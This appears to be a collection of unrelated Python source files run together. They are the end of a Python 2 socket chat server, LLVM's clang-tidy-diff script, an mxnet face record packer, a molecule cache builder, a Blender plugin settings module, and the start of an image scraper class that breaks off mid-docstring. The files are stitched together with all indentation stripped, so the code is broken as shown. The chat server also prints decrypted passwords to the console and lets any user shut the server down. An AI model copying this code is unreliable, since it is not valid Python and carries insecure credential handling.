i = 0
while (i < len(database_doc_list) and (not salir)): # Working
print " LIST DATABASE: " + format(database_doc_list)
sublist = re.split('[;#]', database_doc_list[i])
print " SUBLIST: " + format(sublist)
if (user_name == sublist[0]):
if (password == sublist[1]):
answer = True
else:
salir = True
i = i + 1
return answer
##
# The user is asked to introduce his data by parameter and it will be check if
# the data input is equal to the one saved in the txt file.
#
# @param: client_sock Raw socket
#
# @return: A list with a boolean telling if the input was found in the txt, and
# the username inputed.
def login_user(client_sock):
client_sock.sendall('<Server>: Write your user name:')
user_name = client_sock.recv(buffer_size)
client_sock.sendall('<Server>: Write your password:')
user_password = client_sock.recv(buffer_size)
answer = (False, user_name)
with open('database/users_credentials.enc', 'r') as rDoc:
database_doc_list = decrypt_list(rDoc.read().split("+$&$&+"))
print "ENCRYPTED:" + format(rDoc.read().split("+$&$&+"))
rDoc.close() # Close the document
print "DESENCRYPTED:" + format(database_doc_list)
#database_doc_list = map(lambda each:each.strip("\n"), database_doc_list) # Eliminate '\n' from our list
i = 0
while (not answer[0] and i < len(database_doc_list)):
print " LIST DATABASEp: " + format(database_doc_list)
sublist = re.split('[; #]', database_doc_list[i]) # TODO GOOOD :)
print " SUBLISTp: " + format(sublist)
if (user_name == sublist[0] and (user_password == sublist[1])):
answer = (True, user_name)
else:
answer = (False, user_name)
i = i + 1
return answer
def client_exit(client_sock):
print "\n\n]---------ALL ACTIVE CONNECTIONS:---------\n"
print format(active_connections)
print "\n]-----------------------------------------\n\n"
print "] Disconnecting: " + format(active_connections[get_socket_index(client_sock)])
client_sock.sendall("<Server>: You are going to be disconnected by the server")
stdout.flush()
with lock:
client_sock.sendall(">disconnect")
with lock:
inactive_connections.append(active_connections[get_socket_index(client_sock)])
active_connections.pop(get_socket_index(client_sock))
print "\n\n]---------ALL ACTIVE CONNECTIONS:---------\n"
print format(active_connections)
print "\n]-----------------------------------------\n\n"
def clients_exit(client_sock):
stdout.flush()
i = 0
while i < len(active_connections):
# Handle lists
client_exit(active_connections[i][2])
i += 1
##
# Check if the message introduced as a parameter is of the kind of "command"
# (calling to the specific method to check ir) or if its a typical one, showing
# it through the command line
#
# @param user_name
# @param message
def check_message(client_sock, user_name, message):
if (message.startswith("/")):
print "] Checkeado init"
check_command(client_sock, user_name, message)
print "] Checkeado exit"
else:
currentDT = datetime.datetime.now()
# Print in every client screen
for x in range(len(active_connections)):
active_connections[x][2].sendall(currentDT.strftime("%I:%M %p | ") + user_name + ": " + message)
# Show in server side
print currentDT.strftime(" %I:%M %p | ") + user_name + ": " + message
##
# The message will be check in case on starting with '/' (the command
# Inicialization character), and in every case some specific method
# will be called
#
# @param message String with the text input
def check_command(client_sock, user_name, message):
msg = message
if msg.startswith("/viewusers"):
print "] %s solicit /viewusers" % user_name
print "================= ACTIVE CONNECTIONS"
print_list_client(client_sock, active_connections)
elif msg.startswith("/messageto"):
print "] %s solicit /messageto" % user_name
message_to(client_sock, message)
elif msg.startswith("/changepassword"):
print "] %s solicit /changepassword" % user_name
print "e changepassword"
elif msg.startswith("/busy"):
print "] %s solicit /busy" % user_name
client_sock.sendall(">busy")
elif msg.startswith("/free"):
print "] %s solicit /free" % user_name
client_sock.sendall(">free")
elif msg.startswith("/changegrant"):
print "] %s solicit /changegrant" % user_name
change_grant(client_sock, user_name, message)
elif msg.startswith("/kickuser"):
print "] %s solicit /kickuser" % user_name
kick_user(client_sock, message)
elif msg.startswith("/viewkickusers"):
print "] %s solicit /viewkickusers" % user_name
print "================= KICK CONNECTIONS"
print_list_client(client_sock, kick_connections)
elif msg.startswith("/restart"):
print "] %s solicit /restart" % user_name
clients_exit(client_sock)
os._exit(1)
elif msg.startswith("/disconnect"):
print "] %s solicit /disconnect" % user_name
client_exit(client_sock)
elif msg.startswith("/help"):
print "] %s solicit /help" % user_name
client_sock.sendall("You can type:\n /viewusers\n /messageto (username) (message)\n /busy\n /free\n /changegrant (username) (0/1)\n /kickuser (username)\n /viewkickusers\n /restart\n /disconnect")
else:
print "] %s solicit couldm't be resolved. Non existing commands" % user_name
client_sock.sendall("<Server>: [Error typing] Type '/help' see all possible commands")
def message_to(client_sock, message):
sublist = re.split(' ', message) # It will end as ['/messageto', 'username', 'whatever', ...]
index = get_user_index(sublist[1])
if (index != -1):
del sublist[0] # Remove command
print "] PM from: " + sublist[0] + "\n] <Message>"
print ' '.join(sublist)
active_connections[index][2].sendall("] PM from: " + sublist[0] + "\n] <Message>")
del sublist[0] # Remove user_name
print ' '.join(sublist) + "\n] <End of message>"
active_connections[index][2].sendall(' '.join(sublist) + "\n] <End of message>")
else:
client_sock.sendall("Error 3 -> User not found")
def kick_user(client_sock, message):
sublist = re.split(' ', message) # It will end as ['/kickuser', 'username', 'whatever', ...]
index = get_user_index(sublist[1])
if (index != -1):
if (active_connections[get_socket_index(client_sock)][1] == 0): # Only if the origin user is a superuser
active_connections[index][2].sendall(">kick")
user_data = [active_connections[index][0], active_connections[index][1], active_connections[index][2]] # Add to kick list
kick_connections.append(user_data)
client_sock.sendall("================= KICK CONNECTIONS")
print_list_client(client_sock, kick_connections)
client_exit(active_connections[index][2])
else:
client_sock.sendall("Error 3 -> You don't have the grant to make that operation")
else:
client_sock.sendall("Error 4 -> User not found")
def change_grant(client_sock, user_name, message):
# message = command + " " + user_targer + " " + grant
possible = False
if (get_user_grant(user_name) == 0): # If the solicitor is superuser
msg_splited = re.split('[" "]', message)
possible = set_user_grant(msg_splited[1], msg_splited[2])
client_sock.sendall(msg_splited[0] + " " + msg_splited[2])
else:
client_sock.sendall("] You have no grant to make that operation")
return possible
def get_user_grant(user_name):
print "] Get_user_grant"
with open('database/users_credentials.enc', 'r') as rDoc:
database_doc_list = decrypt_list(rDoc.read().split("+$&$&+"))
rDoc.close() # Closing document
#database_doc_list = map(lambda each: each.strip("\n"), database_doc_list) # Eliminate '\n'
grant = -1
i = 0
while ((i < len(database_doc_list)) and (grant < 0)): # Working
sublist = re.split('[;#]', database_doc_list[i])
if (user_name == sublist[0]):
grant = int(sublist[2])
i = i + 1
print "GRANT: " + format(grant)
return grant
def set_user_grant(user_name, new_grant):
print "] Get_user_grant"
# READING
with open('database/users_credentials.enc', 'r') as rDoc:
database_doc_list = decrypt_list(rDoc.read().split("+$&$&+"))
rDoc.close() # Closing document
#database_doc_list = map(lambda each: each.strip("\n"), database_doc_list) # Eliminate '\n'
found = False
i = 0
index_parent_list = 0
while ((i < len(database_doc_list)) and (not found)): # Working
sublist = re.split('[;#]', database_doc_list[i])
if (user_name == sublist[0]):
index_parent_list = i
found = True
user_data = [user_name, sublist[1], new_grant]
i = i + 1
# WRITING If found
if (found):
# Delete line #TODO TODO TODO \n
database_doc_list.append(user_data[0] + ';' + user_data[1] + '#' + user_data[2])
# Add line
database_doc_list.pop(index_parent_list)
with open('database/users_credentials.enc', 'w') as wDoc:
for line in database_doc_list:
ciphertext = encrypt_txt(line)
wDoc.write(ciphertext + "+$&$&+")
wDoc.close()
return found # Know if find
##
# Will search in the active_connections list to look for the appearance of
# the username
#
# @param: user_name
#
# @Return: (-1) if not found, (position) if found
def get_user_index(user_name):
i = 0
encontrado = False
while (i < len(active_connections) and (not encontrado)):
if (user_name == active_connections[i][0]):
encontrado = True
else:
i = i + 1
if encontrado:
return i
else:
return -1
def get_socket_index(socket):
i = 0
encontrado = False
while (i < len(active_connections) and (not encontrado)):
if (socket == active_connections[i][2]):
encontrado = True
else:
i = i + 1
if encontrado:
return i
else:
return -1
##
# Print a list in a formated way
#
# @param list A list inputed as parameter
def print_list_client(client_sock, list):
client_sock.sendall("\n\n---------------------------------\n")
client_sock.sendall(" N | User | Grant \n")
i = 0
while (i < len(list)):
client_sock.sendall(" " + format(i) + " | " + format(list[i][0]) + " | " + format(list[i][1]) + "\n")
i = i + 1
client_sock.sendall("---------------------------------\n\n")
##
# Main
def main(argv):
server_port = 9797
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((host, server_port))
sock.listen(n_connection)
print '] Server on port ' + str(server_port)
logging.info("Server on port {}".format(server_port))
stdout.flush() # Clean
try:
while 1:
client_connection, addr = sock.accept()
print '] Client connected on ' + str(addr[0]) + ':' + str(addr[1]) + '\n'
logging.info("Chat Client Connected on IP {} & Port {}".format(host, server_port))
stdout.flush() # Clean
# THREADIND
server_t = threading.Thread(target=connect_client, args=(client_connection, addr))
server_t.start()
except (KeyboardInterrupt, SystemExit):
stdout.flush()
# For every ip we must close the socket
clients_exit(sock)
print "\nSever down ==================\n"
os._exit(1)
main(argv)
|
clang-tidy-diff.py
|
#!/usr/bin/env python3
#
#===- clang-tidy-diff.py - ClangTidy Diff Checker ------------*- python -*--===#
#
# Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
#
#===------------------------------------------------------------------------===#
r"""
ClangTidy Diff Checker
======================
This script reads input from a unified diff, runs clang-tidy on all changed
files and outputs clang-tidy warnings in changed lines only. This is useful to
detect clang-tidy regressions in the lines touched by a specific patch.
Example usage for git/svn users:
git diff -U0 HEAD^ | clang-tidy-diff.py -p1
svn diff --diff-cmd=diff -x-U0 | \
clang-tidy-diff.py -fix -checks=-*,modernize-use-override
"""
import argparse
import glob
import json
import multiprocessing
import os
import re
import shutil
import subprocess
import sys
import tempfile
import threading
import traceback
try:
import yaml
except ImportError:
yaml = None
is_py2 = sys.version[0] == '2'
if is_py2:
import Queue as queue
else:
import queue as queue
def run_tidy(task_queue, lock, timeout):
watchdog = None
while True:
command = task_queue.get()
try:
proc = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if timeout is not None:
watchdog = threading.Timer(timeout, proc.kill)
watchdog.start()
stdout, stderr = proc.communicate()
with lock:
sys.stdout.write(stdout.decode('utf-8') + '\n')
sys.stdout.flush()
if stderr:
sys.stderr.write(stderr.decode('utf-8') + '\n')
sys.stderr.flush()
except Exception as e:
with lock:
sys.stderr.write('Failed: ' + str(e) + ': '.join(command) + '\n')
finally:
with lock:
if (not timeout is None) and (not watchdog is None):
if not watchdog.is_alive():
sys.stderr.write('Terminated by timeout: ' +
' '.join(command) + '\n')
watchdog.cancel()
task_queue.task_done()
def start_workers(max_tasks, tidy_caller, task_queue, lock, timeout):
for _ in range(max_tasks):
t = threading.Thread(target=tidy_caller, args=(task_queue, lock, timeout))
t.daemon = True
t.start()
def merge_replacement_files(tmpdir, mergefile):
"""Merge all replacement files in a directory into a single file"""
# The fixes suggested by clang-tidy >= 4.0.0 are given under
# the top level key 'Diagnostics' in the output yaml files
mergekey = "Diagnostics"
merged = []
for replacefile in glob.iglob(os.path.join(tmpdir, '*.yaml')):
content = yaml.safe_load(open(replacefile, 'r'))
if not content:
continue # Skip empty files.
merged.extend(content.get(mergekey, []))
if merged:
# MainSourceFile: The key is required by the definition inside
# include/clang/Tooling/ReplacementsYaml.h, but the value
# is actually never used inside clang-apply-replacements,
# so we set it to '' here.
output = { 'MainSourceFile': '', mergekey: merged }
with open(mergefile, 'w') as out:
yaml.safe_dump(output, out)
else:
# Empty the file:
open(mergefile, 'w').close()
def main():
parser = argparse.ArgumentParser(description=
'Run clang-tidy against changed files, and '
'output diagnostics only for modified '
'lines.')
parser.add_argument('-clang-tidy-binary', metavar='PATH',
default='clang-tidy',
help='path to clang-tidy binary')
parser.add_argument('-p', metavar='NUM', default=0,
help='strip the smallest prefix containing P slashes')
parser.add_argument('-regex', metavar='PATTERN', default=None,
help='custom pattern selecting file paths to check '
'(case sensitive, overrides -iregex)')
parser.add_argument('-iregex', metavar='PATTERN', default=
r'.*\.(cpp|cc|c\+\+|cxx|c|cl|h|hpp|m|mm|inc)',
help='custom pattern selecting file paths to check '
'(case insensitive, overridden by -regex)')
parser.add_argument('-j', type=int, default=1,
help='number of tidy instances to be run in parallel.')
parser.add_argument('-timeout', type=int, default=None,
help='timeout per each file in seconds.')
parser.add_argument('-fix', action='store_true', default=False,
help='apply suggested fixes')
parser.add_argument('-checks',
help='checks filter, when not specified, use clang-tidy '
'default',
default='')
parser.add_argument('-path', dest='build_path',
help='Path used to read a compile command database.')
parser.add_argument('-vfsoverlay', dest='vfsoverlay', metavar='VFSFILE',
help='Specified a VFS overlay configuration file')
if yaml:
parser.add_argument('-export-fixes', metavar='FILE', dest='export_fixes',
help='Create a yaml file to store suggested fixes in, '
'which can be applied with clang-apply-replacements.')
parser.add_argument('-extra-arg', dest='extra_arg',
action='append', default=[],
help='Additional argument to append to the compiler '
'command line.')
parser.add_argument('-extra-arg-before', dest='extra_arg_before',
action='append', default=[],
help='Additional argument to prepend to the compiler '
'command line.')
parser.add_argument('-quiet', action='store_true', default=False,
help='Run clang-tidy in quiet mode')
clang_tidy_args = []
argv = sys.argv[1:]
if '--' in argv:
clang_tidy_args.extend(argv[argv.index('--'):])
argv = argv[:argv.index('--')]
args = parser.parse_args(argv)
# Extract changed lines for each file.
filename = None
lines_by_file = {}
for line in sys.stdin:
match = re.search('^\+\+\+\ \"?(.*?/){%s}([^ \t\n\"]*)' % args.p, line)
if match:
filename = match.group(2)
if filename is None:
continue
if args.regex is not None:
if not re.match('^%s$' % args.regex, filename):
continue
else:
if not re.match('^%s$' % args.iregex, filename, re.IGNORECASE):
continue
match = re.search('^@@.*\+(\d+)(,(\d+))?', line)
if match:
start_line = int(match.group(1))
line_count = 1
if match.group(3):
line_count = int(match.group(3))
if line_count == 0:
continue
end_line = start_line + line_count - 1
lines_by_file.setdefault(filename, []).append([start_line, end_line])
if not any(lines_by_file):
print("No relevant changes found.")
sys.exit(0)
max_task_count = args.j
if max_task_count == 0:
max_task_count = multiprocessing.cpu_count()
max_task_count = min(len(lines_by_file), max_task_count)
tmpdir = None
if yaml and args.export_fixes:
tmpdir = tempfile.mkdtemp()
# Tasks for clang-tidy.
task_queue = queue.Queue(max_task_count)
# A lock for console output.
lock = threading.Lock()
# Run a pool of clang-tidy workers.
start_workers(max_task_count, run_tidy, task_queue, lock, args.timeout)
# Form the common args list.
common_clang_tidy_args = []
if args.fix:
common_clang_tidy_args.append('-fix')
if args.checks != '':
common_clang_tidy_args.append('-checks=' + args.checks)
if args.quiet:
common_clang_tidy_args.append('-quiet')
if args.build_path is not None:
common_clang_tidy_args.append('-p=%s' % args.build_path)
if args.vfsoverlay is not None:
common_clang_tidy_args.append('--vfsoverlay=%s' % args.vfsoverlay)
for arg in args.extra_arg:
common_clang_tidy_args.append('-extra-arg=%s' % arg)
for arg in args.extra_arg_before:
common_clang_tidy_args.append('-extra-arg-before=%s' % arg)
for name in lines_by_file:
line_filter_json = json.dumps(
[{"name": name, "lines": lines_by_file[name]}],
separators=(',', ':'))
# Run clang-tidy on files containing changes.
command = [args.clang_tidy_binary]
command.append('-line-filter=' + line_filter_json)
if yaml and args.export_fixes:
# Get a temporary file. We immediately close the handle so clang-tidy can
# overwrite it.
(handle, tmp_name) = tempfile.mkstemp(suffix='.yaml', dir=tmpdir)
os.close(handle)
command.append('-export-fixes=' + tmp_name)
command.extend(common_clang_tidy_args)
command.append(name)
command.extend(clang_tidy_args)
task_queue.put(command)
# Wait for all threads to be done.
task_queue.join()
if yaml and args.export_fixes:
print('Writing fixes to ' + args.export_fixes + ' ...')
try:
merge_replacement_files(tmpdir, args.export_fixes)
except:
sys.stderr.write('Error exporting fixes.\n')
traceback.print_exc()
if tmpdir:
shutil.rmtree(tmpdir)
if __name__ == '__main__':
main()
|
face2rec2.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
#curr_path = os.path.abspath(os.path.dirname(__file__))
#sys.path.append(os.path.join(curr_path, "../python"))
import mxnet as mx
import random
import argparse
import cv2
import time
import traceback
#from builtins import range
from easydict import EasyDict as edict
sys.path.append(os.path.join(os.path.dirname(__file__), 'common'))
import face_preprocess
import face_image
try:
import multiprocessing
except ImportError:
multiprocessing = None
def read_list(path_in):
with open(path_in) as fin:
identities = []
last = [-1, -1]
_id = 1
while True:
line = fin.readline()
if not line:
break
item = edict()
item.flag = 0
item.image_path, label, item.bbox, item.landmark, item.aligned = face_preprocess.parse_lst_line(line)
if not item.aligned and item.landmark is None:
#print('ignore line', line)
continue
item.id = _id
item.label = [label, item.aligned]
yield item
if label!=last[0]:
if last[1]>=0:
identities.append( (last[1], _id) )
last[0] = label
last[1] = _id
_id+=1
identities.append( (last[1], _id) )
item = edict()
item.flag = 2
item.id = 0
item.label = [float(_id), float(_id+len(identities))]
yield item
for identity in identities:
item = edict()
item.flag = 2
item.id = _id
_id+=1
item.label = [float(identity[0]), float(identity[1])]
yield item
def image_encode(args, i, item, q_out):
oitem = [item.id]
#print('flag', item.flag)
if item.flag==0:
fullpath = item.image_path
header = mx.recordio.IRHeader(item.flag, item.label, item.id, 0)
#print('write', item.flag, item.id, item.label)
if item.aligned:
with open(fullpath, 'rb') as fin:
img = fin.read()
s = mx.recordio.pack(header, img)
q_out.put((i, s, oitem))
else:
img = cv2.imread(fullpath, args.color)
assert item.landmark is not None
img = face_preprocess.preprocess(img, bbox = item.bbox, landmark=item.landmark, image_size='%d,%d'%(args.image_h, args.image_w))
s = mx.recordio.pack_img(header, img, quality=args.quality, img_fmt=args.encoding)
q_out.put((i, s, oitem))
else:
header = mx.recordio.IRHeader(item.flag, item.label, item.id, 0)
#print('write', item.flag, item.id, item.label)
s = mx.recordio.pack(header, b'')
q_out.put((i, s, oitem))
def read_worker(args, q_in, q_out):
while True:
deq = q_in.get()
if deq is None:
break
i, item = deq
image_encode(args, i, item, q_out)
def write_worker(q_out, fname, working_dir):
pre_time = time.time()
count = 0
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
buf = {}
more = True
while more:
deq = q_out.get()
if deq is not None:
i, s, item = deq
buf[i] = (s, item)
else:
more = False
while count in buf:
s, item = buf[count]
del buf[count]
if s is not None:
#print('write idx', item[0])
record.write_idx(item[0], s)
if count % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', count)
pre_time = cur_time
count += 1
def parse_args():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Create an image list or \
make a record database by reading from an image list')
parser.add_argument('prefix', help='prefix of input/output lst and rec files.')
#parser.add_argument('root', help='path to folder containing images.')
cgroup = parser.add_argument_group('Options for creating image lists')
cgroup.add_argument('--list', type=bool, default=False,
help='If this is set im2rec will create image list(s) by traversing root folder\
and output to <prefix>.lst.\
Otherwise im2rec will read <prefix>.lst and create a database at <prefix>.rec')
cgroup.add_argument('--exts', nargs='+', default=['.jpeg', '.jpg'],
help='list of acceptable image extensions.')
cgroup.add_argument('--chunks', type=int, default=1, help='number of chunks.')
cgroup.add_argument('--train-ratio', type=float, default=1.0,
help='Ratio of images to use for training.')
cgroup.add_argument('--test-ratio', type=float, default=0,
help='Ratio of images to use for testing.')
cgroup.add_argument('--recursive', type=bool, default=False,
help='If true recursively walk through subdirs and assign an unique label\
to images in each folder. Otherwise only include images in the root folder\
and give them label 0.')
cgroup.add_argument('--shuffle', type=bool, default=True, help='If this is set as True, \
im2rec will randomize the image order in <prefix>.lst')
rgroup = parser.add_argument_group('Options for creating database')
rgroup.add_argument('--quality', type=int, default=95,
help='JPEG quality for encoding, 1-100; or PNG compression for encoding, 1-9')
rgroup.add_argument('--num-thread', type=int, default=8,
help='number of thread to use for encoding. order of images will be different\
from the input list if >1. the input list will be modified to match the\
resulting order.')
rgroup.add_argument('--color', type=int, default=1, choices=[-1, 0, 1],
help='specify the color mode of the loaded image.\
1: Loads a color image. Any transparency of image will be neglected. It is the default flag.\
0: Loads image in grayscale mode.\
-1:Loads image as such including alpha channel.')
rgroup.add_argument('--encoding', type=str, default='.jpg', choices=['.jpg', '.png'],
help='specify the encoding of the images.')
rgroup.add_argument('--pack-label', type=bool, default=False,
help='Whether to also pack multi dimensional label in the record file')
args = parser.parse_args()
args.prefix = os.path.abspath(args.prefix)
#args.root = os.path.abspath(args.root)
return args
if __name__ == '__main__':
args = parse_args()
if args.list:
pass
#make_list(args)
else:
if os.path.isdir(args.prefix):
working_dir = args.prefix
else:
working_dir = os.path.dirname(args.prefix)
prop = face_image.load_property(working_dir)
image_size = prop.image_size
print('image_size', image_size)
args.image_h = image_size[0]
args.image_w = image_size[1]
files = [os.path.join(working_dir, fname) for fname in os.listdir(working_dir)
if os.path.isfile(os.path.join(working_dir, fname))]
count = 0
for fname in files:
if fname.startswith(args.prefix) and fname.endswith('.lst'):
print('Creating .rec file from', fname, 'in', working_dir)
count += 1
image_list = read_list(fname)
# -- write_record -- #
if args.num_thread > 1 and multiprocessing is not None:
q_in = [multiprocessing.Queue(1024) for i in range(args.num_thread)]
q_out = multiprocessing.Queue(1024)
read_process = [multiprocessing.Process(target=read_worker, args=(args, q_in[i], q_out)) \
for i in range(args.num_thread)]
for p in read_process:
p.start()
write_process = multiprocessing.Process(target=write_worker, args=(q_out, fname, working_dir))
write_process.start()
for i, item in enumerate(image_list):
q_in[i % len(q_in)].put((i, item))
for q in q_in:
q.put(None)
for p in read_process:
p.join()
q_out.put(None)
write_process.join()
else:
print('multiprocessing not available, fall back to single threaded encoding')
try:
import Queue as queue
except ImportError:
import queue
q_out = queue.Queue()
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
cnt = 0
pre_time = time.time()
for i, item in enumerate(image_list):
image_encode(args, i, item, q_out)
if q_out.empty():
continue
_, s, item = q_out.get()
#header, _ = mx.recordio.unpack(s)
#print('write header label', header.label)
record.write_idx(item[0], s)
if cnt % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', cnt)
pre_time = cur_time
cnt += 1
if not count:
print('Did not find and list file with prefix %s'%args.prefix)
|
create_molcache2.py
|
'''Takes a bunch of types training files. First argument is what index the receptor starts on
Reads in the gninatypes files specified in these types files and writes out a monolithic receptor cache file.
Version 2 is optimized for memory mapped storage of caches. keys (file names) are stored
first followed by dense storage of values (coordinates and types).
Thanks to David Koes for original script (https://github.com/gnina/scripts/blob/master/create_caches2.py)
'''
import os, sys
import struct, argparse, traceback
import multiprocessing
mols_to_read = multiprocessing.Queue()
mols_to_write = multiprocessing.Queue()
N = multiprocessing.cpu_count() * 2
def read_data(data_root):
'''read a types file and put it in mols_to_write'''
while True:
sys.stdout.flush()
mol = mols_to_read.get()
if mol == None:
break
fname = mol
if len(data_root):
fname = data_root + '/' + mol
try:
with open(fname, 'rb') as gninatype:
data = gninatype.read()
assert (len(data) % 16 == 0)
if len(data) == 0:
print(fname, "EMPTY")
else:
mols_to_write.put((mol, data))
except Exception as e:
print(fname)
print(e)
mols_to_write.put(None)
def fill_queue(molfiles):
'thread for filling mols_to_read'
for mol in molfiles:
mols_to_read.put(mol)
for _ in range(N):
mols_to_read.put(None)
def create_cache2(molfiles, data_root, outfile):
'''Create an outfile molcache2 file from the list molfiles stored at data_root.'''
out = open(outfile, 'wb')
# first byte is for versioning
out.write(struct.pack('i', -1))
out.write(struct.pack('L', 0)) # placeholder for offset to keys
filler = multiprocessing.Process(target=fill_queue, args=(molfiles,))
filler.start()
readers = multiprocessing.Pool(N)
for _ in range(N):
readers.apply_async(read_data, (data_root,))
offsets = dict() # indxed by mol, location of data
# start writing molecular data
endcnt = 0
while True:
moldata = mols_to_write.get()
if moldata == None:
endcnt += 1
if endcnt == N:
break
else:
continue
(mol, data) = moldata
offsets[mol] = out.tell()
natoms = len(data) // 16
out.write(struct.pack('i', natoms))
out.write(data)
start = out.tell() # where the names start
for mol in molfiles:
if len(mol) > 255:
print("Skipping", mol, "since filename is too long")
continue
if mol not in offsets:
print("SKIPPING", mol, "since failed to read it in")
continue
s = bytes(mol, encoding='UTF-8')
out.write(struct.pack('B', len(s)))
out.write(s)
out.write(struct.pack('L', offsets[mol]))
# now set start
out.seek(4)
out.write(struct.pack('L', start))
out.seek(0, os.SEEK_END)
out.close()
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--col', required=True, type=int, help='Column receptor starts on')
parser.add_argument('--recmolcache', default='rec.molcache2', type=str, help='Filename of receptor cache')
parser.add_argument('-d', '--data_root', type=str, required=False,
help="Root folder for relative paths in train/test files", default='')
parser.add_argument('fnames', nargs='+', type=str, help='types files to process')
args = parser.parse_args()
# load all file names into memory
seenrec = set()
for fname in args.fnames:
for line in open(fname):
vals = line.split()
rec = vals[args.col]
if rec not in seenrec:
seenrec.add(rec)
create_cache2(sorted(list(seenrec)), args.data_root, args.recmolcache)
|
settings.py
|
# MIT License
# Copyright (c) 2017 GiveMeAllYourCats
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the 'Software'), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Code author: Hotox
# Edits by: Hotox
import os
import bpy
import json
import copy
import time
import pathlib
import collections
import tools.supporter
from threading import Thread
from datetime import datetime
from collections import OrderedDict
main_dir = pathlib.Path(os.path.dirname(__file__)).parent.resolve()
resources_dir = os.path.join(str(main_dir), "resources")
settings_file = os.path.join(resources_dir, "settings.json")
settings_data = None
settings_data_unchanged = None
def load_settings():
print('READING SETTINGS FILE')
global settings_data, settings_data_unchanged
# Load settings file and reset it if errors are found
try:
with open(settings_file, encoding="utf8") as file:
settings_data = json.load(file, object_pairs_hook=collections.OrderedDict)
print('SETTINGS LOADED!')
except FileNotFoundError:
print("SETTINGS FILE NOT FOUND!")
reset_settings()
return
except json.decoder.JSONDecodeError:
print("ERROR FOUND IN SETTINGS FILE")
reset_settings()
return
# Check for missing entries, reset if neccessary
if 'last_supporter_update' not in settings_data or 'use_custom_mmd_tools' not in settings_data:
reset_settings()
return
# Check if timestamps are correct
if settings_data.get('last_supporter_update'):
try:
datetime.strptime(settings_data.get('last_supporter_update'), tools.supporter.time_format)
except ValueError:
settings_data['last_supporter_update'] = None
print('RESET TIME')
# Save the settings into the unchanged settings in order to know if the settings changed later
settings_data_unchanged = copy.deepcopy(settings_data)
def save_settings():
with open(settings_file, 'w', encoding="utf8") as outfile:
json.dump(settings_data, outfile, ensure_ascii=False, indent=4)
def reset_settings():
global settings_data, settings_data_unchanged
settings_data = OrderedDict()
settings_data['last_supporter_update'] = None
settings_data['use_custom_mmd_tools'] = False
save_settings()
settings_data_unchanged = copy.deepcopy(settings_data)
print('SETTINGS RESET')
def start_apply_settings_timer():
thread = Thread(target=apply_settings, args=[])
thread.start()
def apply_settings():
time.sleep(2)
bpy.context.scene.use_custom_mmd_tools = settings_data.get('use_custom_mmd_tools')
def settings_changed():
if settings_data.get('use_custom_mmd_tools') != settings_data_unchanged.get('use_custom_mmd_tools'):
return True
return False
def set_last_supporter_update(last_supporter_update):
settings_data['last_supporter_update'] = last_supporter_update
save_settings()
def get_last_supporter_update():
return settings_data.get('last_supporter_update')
def set_use_custom_mmd_tools(self, context):
settings_data['use_custom_mmd_tools'] = bpy.context.scene.use_custom_mmd_tools
save_settings()
def use_custom_mmd_tools(self, context):
return settings_data.get('use_custom_mmd_tools')
|
beauty_scraper.py
|
# -*- coding: utf-8 -*-
import os
import requests
import shutil
import time
import threading
import beauty_scraper_util as bsUtil
from bs4 import BeautifulSoup
from abc import ABCMeta, abstractmethod
DL_FOLDER_NAME = 'downloads'
class BeautyScraper(object):
'''Inherit this class and overwrite all the abstractmethods'''
__metaclass__ = ABCMeta
@abstractmethod
def get_category_urls(self):
'''Provide category start urls and its name
Example:
return {"http://www.iyi8.com/hot/": "hot",
"http://www.iyi8.com/photo/mm/":"mm",
"http://www.iyi8.com/photo/sexy/": "sexy",
"http://www.iyi8.com/photo/star/": "star",
"http://www.iyi8.com/photo/event/": "event",
}
'''
pass
@abstractmethod
def get_page_url(self, index, first_url):
'''Provide page url with index based on first_url.
e.g.:
index 0 (first_url): "http://www.iyi8.com/star"
index 3: "http://www.iyi8.com/star/3.html"
'''
pass
@abstractmethod
def get_download_folder_path(self):
'''Provide path for download folder name.
beauty_scraper will create a folder located at the provided path for downloaded images.
The path is relatived to current module path.
e.g.:
return "downloads"
